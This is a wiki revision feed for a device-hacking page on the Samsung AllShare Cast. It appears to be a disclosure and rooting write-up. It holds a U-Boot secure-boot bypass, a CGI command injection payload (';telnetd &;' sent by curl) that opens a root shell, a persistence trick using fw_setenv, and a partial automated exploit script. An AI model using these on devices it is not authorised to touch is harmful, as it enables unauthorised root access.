https://www.Exploitee.rs/index.php?title=Samsung_Allshare_Cast&feed=atom&action=history
Samsung Allshare Cast - Revision history
2024-03-28T16:52:36Z
Revision history for this page on the wiki
MediaWiki 1.37.2
https://www.Exploitee.rs/index.php?title=Samsung_Allshare_Cast&diff=2780&oldid=prev
Zenofex at 13:06, 5 August 2017
2017-08-05T13:06:30Z
<p></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="en">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 13:06, 5 August 2017</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l11">Line 11:</td>
<td colspan="2" class="diff-lineno">Line 11:</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>[http://www.samsung.com/us/mobile/cell-phones-accessories/EAD-T10JDEGSTA-compatible compatible-devices]</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>[http://www.samsung.com/us/mobile/cell-phones-accessories/EAD-T10JDEGSTA-compatible compatible-devices]</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">== Purchase ==</ins></div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.</ins></div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">[https://www.amazon.com/Samsung-All-Share-Wireless-Display-Adapter/dp/B0089VO7MY/ref=as_li_ss_tl?ie=UTF8&qid=1501938334&sr=8-2&keywords=Allshare+Cast&linkCode=ll1&tag=exploiteers-20&linkId=8be97bb1074d95e346270007ac0e3bf5 Purchase the Allshare Cast at Amazon]</ins></div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>==GPL==</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>==GPL==</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>You can find the GPL code for this device [http://openpre.samsung.com/reception/receptionSub.do?method=sub&sub=F&searchValue=EAD-T10: here].</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>You can find the GPL code for this device [http://openpre.samsung.com/reception/receptionSub.do?method=sub&sub=F&searchValue=EAD-T10: here].</div></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del style="font-weight: bold; text-decoration: none;"></del></div></td><td colspan="2" class="diff-side-added"></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>==Teardown==</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>==Teardown==</div></td></tr>
<!-- diff cache key gtvhack_wiki:diff::1.12:old-2670:rev-2780 -->
</table>
Zenofex
https://www.Exploitee.rs/index.php?title=Samsung_Allshare_Cast&diff=2670&oldid=prev
Zenofex at 07:05, 29 January 2017
2017-01-29T07:05:29Z
<p></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="en">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 07:05, 29 January 2017</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l1">Line 1:</td>
<td colspan="2" class="diff-lineno">Line 1:</td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">__FORCETOC__</ins></div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">{{Disclaimer}}</ins></div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>[[File:Allsharecast.jpg|thumb|320px]]</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>[[File:Allsharecast.jpg|thumb|320px]]</div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">[[Category:Samsung Allshare Cast]]</ins></div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>=Samsung Allshare Cast Hub=</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>=Samsung Allshare Cast Hub=</div></td></tr>
<!-- diff cache key gtvhack_wiki:diff::1.12:old-2668:rev-2670 -->
</table>
Zenofex
https://www.Exploitee.rs/index.php?title=Samsung_Allshare_Cast&diff=2668&oldid=prev
Zenofex: Zenofex moved page Samsung allshare cast hub to Samsung Allshare Cast
2017-01-29T07:01:12Z
<p>Zenofex moved page <a href="/index.php/Samsung_allshare_cast_hub" class="mw-redirect" title="Samsung allshare cast hub">Samsung allshare cast hub</a> to <a href="/index.php/Samsung_Allshare_Cast" title="Samsung Allshare Cast">Samsung Allshare Cast</a></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="en">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 07:01, 29 January 2017</td>
</tr>
<!-- diff cache key gtvhack_wiki:diff::1.12:old-2667:rev-2668 -->
</table>
Zenofex
https://www.Exploitee.rs/index.php?title=Samsung_Allshare_Cast&diff=2667&oldid=prev
0x00string at 07:00, 29 January 2017
2017-01-29T07:00:17Z
<p></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="en">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 07:00, 29 January 2017</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l1">Line 1:</td>
<td colspan="2" class="diff-lineno">Line 1:</td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>[[File:Allsharecast.jpg|320px]]</div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>[[File:Allsharecast.jpg<ins style="font-weight: bold; text-decoration: none;">|thumb</ins>|320px]]</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>=Samsung Allshare Cast Hub=</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>=Samsung Allshare Cast Hub=</div></td></tr>
<!-- diff cache key gtvhack_wiki:diff::1.12:old-2666:rev-2667 -->
</table>
0x00string
https://www.Exploitee.rs/index.php?title=Samsung_Allshare_Cast&diff=2666&oldid=prev
0x00string at 06:58, 29 January 2017
2017-01-29T06:58:55Z
<p></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="en">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 06:58, 29 January 2017</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l268">Line 268:</td>
<td colspan="2" class="diff-lineno">Line 268:</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>===PoC===</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>===PoC===</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del style="font-weight: bold; text-decoration: none;"><iframe width="560" height="315" src="</del>https://www.youtube.com/embed/7fCZu7DEAX8<del style="font-weight: bold; text-decoration: none;">" frameborder="0" allowfullscreen></iframe></del></div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">[</ins>https://www.youtube.com/embed/7fCZu7DEAX8 <ins style="font-weight: bold; text-decoration: none;">PoC Demo]</ins></div></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div> </div></td><td colspan="2" class="diff-side-added"></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div> </div></td><td colspan="2" class="diff-side-added"></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>The following PoC will automatically scan IPs to locate the AllShare Cast, exploit the CGI command injection to get a telnet shell, restart screen mirroring and automate a telnet session to gain persistent root.</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>The following PoC will automatically scan IPs to locate the AllShare Cast, exploit the CGI command injection to get a telnet shell, restart screen mirroring and automate a telnet session to gain persistent root.</div></td></tr>
<!-- diff cache key gtvhack_wiki:diff::1.12:old-2665:rev-2666 -->
</table>
0x00string
https://www.Exploitee.rs/index.php?title=Samsung_Allshare_Cast&diff=2665&oldid=prev
0x00string: Created page with "320px =Samsung Allshare Cast Hub= The AllShare Cast Hub (EAD-T10JDEGSTA) is a device for streaming video from a mobile device to an HDMI display...."
2017-01-29T06:58:02Z
<p>Created page with "<a href="/index.php/File:Allsharecast.jpg" title="File:Allsharecast.jpg">320px</a> =Samsung Allshare Cast Hub= The AllShare Cast Hub (EAD-T10JDEGSTA) is a device for streaming video from a mobile device to an HDMI display...."</p>
<p><b>New page</b></p><div>[[File:Allsharecast.jpg|320px]]<br />
<br />
=Samsung Allshare Cast Hub=<br />
<br />
The AllShare Cast Hub (EAD-T10JDEGSTA) is a device for streaming video from a mobile device to an HDMI display.<br />
<br />
[http://www.amazon.com/Samsung-All-Share-Wireless-Display-Adapter/dp/B0089VO7MY/ Amazon]<br />
[http://www.samsung.com/us/mobile/cell-phones-accessories/EAD-T10JDEGSTA-compatible compatible-devices]<br />
<br />
<br />
==GPL==<br />
<br />
You can find the GPL code for this device [http://openpre.samsung.com/reception/receptionSub.do?method=sub&sub=F&searchValue=EAD-T10: here].<br />
<br />
<br />
==Teardown==<br />
===Disassembly===<br />
[[File:Ascuart.jpg|320px]]<br />
[[File:Asctop.jpg|320px]]<br />
[[File:Ascbottom.JPG|320px]]<br />
[[File:Ascnoshield.JPG|320px]]<br />
<br />
<br />
<br />
===UART===<br />
Connect your UART adapter to the highlighted pads and set your adapters baudrate to 115200.<br />
<br />
<br />
<br />
====Bypass autoboot====<br />
<br />
After connecting to UART, autoboot can be bypassed by typing any character. Button mashing will work.<br />
<br />
Interrupting uboot allows us to review and change environment variables, like bootdelay, bootcmd or bootargs.<br />
<br />
changing the bootdelay variable will make bypassing autoboot easier on subsequent boots.<br />
<br />
<br />
<pre><br />
>setenv bootdelay 5<br />
<br />
>saveenv<br />
</pre><br />
<br />
==Secure Boot Bypass==<br />
===Reversing boots===<br />
After a quick look at environment variables, you'll find that bootcmd is set to call <b>boots</b>.<br />
<pre><br />
bootcmd=run ${INTFPRG}; boots<br />
</pre><br />
<br />
<br />
Hijacking init by changing the bootargs environment variable will not work here, as <b>boots</b> verifies bootargs before proceeding. Changing bootcmd will not work either, as <b>boots</b> loads two encrypted blobs from NAND into RAM, decrypts them, and then boots from them.<br />
<br />
We can use <b>bootm</b> instead, which does not filter bootargs and will boot a kernel from a specified location in memory. Before this can be done, the kernel must also be decrypted. The <b>cryptotest</b> command is available in uboot and is included in GPL code. We can use <b>cryptotest</b>, <b>nand</b> and <b>bootm</b> to bypass secure boot on this device.<br />
<br />
<br />
Lets take a look at the inputs required by <b>cryptotest</b> and <b>nand read</b><br />
<br />
*<b>nand read</b> takes two arguments:<br />
<br />
** a NAND source address<br />
<br />
** a RAM destination address<br />
<br />
*** optionally, a third argument, length, can be provided<br />
<br />
<br />
<br />
<br />
<br />
*<b>cryptotest</b> takes three arguments:<br />
<br />
** the RAM source address of the encrypted kernel<br />
<br />
** the RAM destination address of the decrypted output<br />
<br />
** the size of the data to be decrypted<br />
<br />
<br />
<br />
Based on the information found in the GPL code, and the required arguments for the <b>nand</b> and <b>cryptotest</b> we will be able to decrypt and boot the kernel with the following commands:<br />
<br />
*<b>nand read 06020000 2400000</b> ''06020000 RAM destination address, and 240000 NAND source address''<br />
<br />
<br />
*<b>cryptotest 06020000 08080000 2000000</b> ''06020000 RAM source address, 08080000 RAM destination address, and 2000000 size''<br />
<br />
<br />
*<b>nand read 8000000 5801000 20000</b> ''8000000 RAM destination address, 5801000 NAND source address, and 20000 size''<br />
<br />
<br />
*<b>cryptotest 8000000 bfff000 20000</b> ''8000000 RAM source address, bfff000 RAM destination address, and 20000 size''<br />
<hr><br />
<br />
<br />
<br />
<br />
===Using bootm and cryptotest to bypass secure-boot===<br />
<pre><br />
U-Boot 2011.06-svn11394 (Aug 09 2012 - 10:40:00)<br />
[...]<br />
Hit any key to stop autoboot: 0<br />
[...]<br />
CNCl800L>nand read 06020000 2400000<br />
NAND read: device 0 offset 0x2400000, size 0x2000000<br />
Skipping bad block 0x03a60000<br />
Skipping bad block 0x042c0000<br />
33554432 bytes read: OK<br />
[...]<br />
CNCl800L> cryptotest 06020000 08080000 2000000<br />
length 33554432: 511 whole chunks with 65536 remainder<br />
done!<br />
[...]<br />
CNCl800L>nand read 8000000 5801000 20000<br />
NAND read: device 0 offset 0x5801000, size 0x20000<br />
131072 bytes read: OK<br />
[...]<br />
CNCl800L> cryptotest 8000000 bfff000 20000<br />
length 131072: 1 whole chunks with 65536 remainder<br />
done!<br />
[...]<br />
setenv bootargs ${bootargs} init=/bin/sh<br />
[...]<br />
CNCl800L>bootm 08080000<br />
Starting kernel ...<br />
<br />
Uncompressing Linux..........................................................................<br />
..................................................................... done, booting the kernel.<br />
Linux version 2.6.32.45-SDK-0.7 (builder@qabuild2) (gcc version 4.4.1<br />
(prery G++ Lite 2010q1-202) ) #1 PREEMPT Sun Nov 25 10:56:43 PST 2012<br />
CPU: ARMv6-compatible processor [410fb767] revision 7 (ARMv7), cr=00c5387f<br />
CPU: VIPT aliasing data cache, VIPT aliasing instruction cache<br />
Machine: Celestial CNC1800L<br />
[...]<br />
ATH-80:57:19:85:F2:28:/root # id<br />
uid=0(root) gid=0(root) groups=0(root),10(wheel)<br />
</pre><br />
<br />
<br />
==CGI Command Injection==<br />
The AllShare Cast runs a web interface on TCP port 80 which hosts cgi scripts that are vulnerable to command injection.<br />
<br />
This can be exploited from a phone, or any device that can establish a wfd connection with the AllShare Cast (P2P/WPS-PCB).<br />
<br />
<br />
<br />
===Setup===<br />
<i>You will need</i><br />
* A device capable of establishing a connection with the AllShare Cast<br />
<br />
** (Tested on a rooted Samsung Galaxy S 3)<br />
<br />
* A [http://cache.saurik.com/android/armel/busybox busybox] binary (greets, saurik!)<br />
<br />
* Curl, or a browser<br />
<br />
<br />
===Connect to the device===<br />
Use adb to push your busybox binary to /data/local/tmp/<br />
<br />
*e.g., <b>./adb push busybox /data/local/tmp/</b>.<br />
<br />
On your phone, pull down the drop down menu and start screen mirroring.<br />
<br />
Once connected, the AllShare Cast will have an IP address of 192.168.49.100 to 192.168.49.254<br />
<br />
Use ping or curl to determine the devices IP.<br />
<br />
*This can be automated <b>$ while read l; do echo $l; curl 192.168.49.$l; done < 100-254.txt</b><br />
<br />
<br />
<br />
===Exploiting Web CGI===<br />
[[File:Ascwebinterface.png|thumb|320px|This device runs httpd on TCP port 80.]]<br />
<br />
<br />
This form submits data to a cgi script, but does not properly sanitize user-supplied inputs.<br />
<br />
<u>/cavium/www/index.html | line 80</u><br />
<br />
<pre><br />
[...]<br />
<form action="/cgi-bin/configure-external-ap.sh" enctype="multipart/form-data" method="post"><br />
<input type=text size=40 name=UEnvEXT_AP_SSID value="" /><br />
<select name=UEnvEXT_AP_SECURITY><br />
<option value="NONE" selected=selected>None (OPEN, no authentication)</option><br />
<option value="WEP">WEP</option><br />
<option value="WPAWPA2PSK">WPA/WPA2 PSK</option><br />
<option value="WPAWPA2EAP" disabled>WPA/WPA2 802.1x EAP (not supported)</option><br />
</select><br />
<input type=password size=40 name=UEnvEXT_AP_KEY value="" /><br />
<input type="submit" name="UEnvEXT_AP_ACTION" value="Save This External AP"><br />
<input type="submit" name="UEnvEXT_AP_ACTION" value="Connect to This External AP now"><br />
</form><br />
[...]<br />
</pre><br />
<br />
This input is used by a script located at /cavium/www/cgi-bin/configure-external-ap.sh<br />
<br />
<u>configure-external-ap.sh | line 53</u><br />
<pre><br />
[...]<br />
if wificmd $NEW_EXT_AP_ACTION SSID=\"$NEW_EXT_AP_SSID\" SECTYPE=NONE<br />
then<br />
RESULT="OK"<br />
else<br />
RESULT="Could not setup OPEN mode AP \"$NEW_EXT_AP_SSID\"."<br />
[...]<br />
</pre><br />
<br />
By populating the <b>UEnvEXT_AP_SSID</b> parameter with <b>";reboot;"</b> and selecting the "Save This External AP" button, the device will reboot.<br />
<br />
<br />
<br />
===exploitation===<br />
<br />
We can exploit this form to spawn a telnet service by setting the <b>UEnvEXT_AP_SSID</b> parameter as <b>";telnetd &;"</b> as in the example below.<br />
<pre>curl -X POST -F 'UEnvEXT_AP_SSID=";telnetd &;"' -F 'UEnvEXT_AP_SECURITY=NONE' -F 'UEnvEXT_AP_KEY='\<br />
-F 'UEnvEXT_AP_ACTION=Save This External AP' http://192.168.49.100/cgi-bin/configure-external-ap.sh</pre><br />
<br />
<br />
After reconnecting to the device, there will be a telnet service listening on TCP port 23. The user is root.<br />
<pre><br />
root@d2att:/data/local/tmp # ./busybox telnet 192.168.49.164 <br />
<br />
Entering character mode<br />
Escape character is '^]'.<br />
<br />
<br />
ATH-80:57:19:85:F2:28 login: root<br />
ATH-80:57:19:85:F2:28:/root # id<br />
uid=0(root) gid=0(root) groups=0(root),10(wheel)<br />
</pre><br />
<br />
===Persistence===<br />
Despite there being only one persistent partition on this device, a script located at <b>/cavium/rc</b> which runs at boot, reads in the <b>EXTRA_CMD</b> firmware environment variable. It then executes the contents of the variable without filtering, as the <b>rc</b> script does for other environment variables.<br />
<br />
<br />
By modifying this environment variable, achieving a persistent root shell is trivial.<br />
<br />
<u>/cavium/rc | line 465</u><br />
<pre><br />
if [ "$EXTRA_CMD" != "" ] ; then<br />
echo "$EXTRA_CMD" >> extra_cmd<br />
chmod a+x extra_cmd<br />
cat extra_cmd >> $STATUS_FILE<br />
echo Running `cat extra_cmd` in the foreground.<br />
extra_cmd<br />
fi<br />
</pre><br />
<br />
<br />
This can be exploited by using <b>/cavium/fw_setenv EXTRA_CMD "telnetd &"</b><br />
<pre><br />
ATH-80:57:19:85:F2:28:/cavium # ./fw_setenv EXTRA_CMD "telnetd &"<br />
ATH-80:57:19:85:F2:28:/cavium # reboot<br />
root@d2att:/data/local/tmp # ./busybox telnet 192.168.49.164 <br />
<br />
Entering character mode<br />
Escape character is '^]'.<br />
<br />
<br />
ATH-80:57:19:85:F2:28 login: root<br />
ATH-80:57:19:85:F2:28:/root # <br />
</pre><br />
<br />
===PoC===<br />
<br />
<iframe width="560" height="315" src="https://www.youtube.com/embed/7fCZu7DEAX8" frameborder="0" allowfullscreen></iframe><br />
<br />
<br />
<br />
The following PoC will automatically scan IPs to locate the AllShare Cast, exploit the CGI command injection to get a telnet shell, restart screen mirroring and automate a telnet session to gain persistent root.<br />
<pre><br />
#!/system/bin/sh<br />
# tested using a rooted Samsung Galaxy S 3<br />
# Make sure you have a busybox binary in the folder where you push this script<br />
# adb into your phone, or run from a terminal emulator<br />
# Establish a screen mirroring session with your AllShare Cast.<br />
# note: ensure your devices screen is not locked!<br />
#<br />
#> adb push allshare-autopwn.sh /data/local/tmp/<br />
#> adb push busybox /data/local/tmp<br />
#> adb shell<br />
#> su -c 'sh /data/local/tmp/allshare-autopwn.sh'<br />
<br />
cd /data/local/tmp<br />
host=100;<br />
while test $host -lt 254;<br />
do<br />
input keyevent 1<br />
echo "[*] trying 192.168.49.$host..."<br />
if curl -s --connect-timeout 1 192.168.49.$host > /dev/null; then<br />
echo "[+] found target: 192.168.49.$host!"<br />
TARGET=192.168.49.$host<br />
break<br />
fi<br />
host=$(($host+1))<br />
done<br />
<br />
if [ -n "$TARGET" ]; then<br />
echo "[+] exploiting target!"<br />
curl -X POST -F 'UEnvEXT_AP_SSID=";telnetd &;"' -F 'UEnvEXT_AP_SECURITY=NONE' -F 'UEnvEXT_AP_KEY=' -F 'UEnvEXT_AP_ACTION=Save This External AP' http://$TARGET/cgi-bin/configure-external-ap.sh > /dev/null<br />
sleep 5<br />
echo "[*] restarting mirror session"<br />
input keyevent 4<br />
am start -n com.android.settings/.wfd.WfdPickerDialog<br />
sleep 15<br />
echo "[*] connecting to target"<br />
input keyevent 4<br />
input keyevent 4<br />
echo "[*] automating telnet session..."<br />
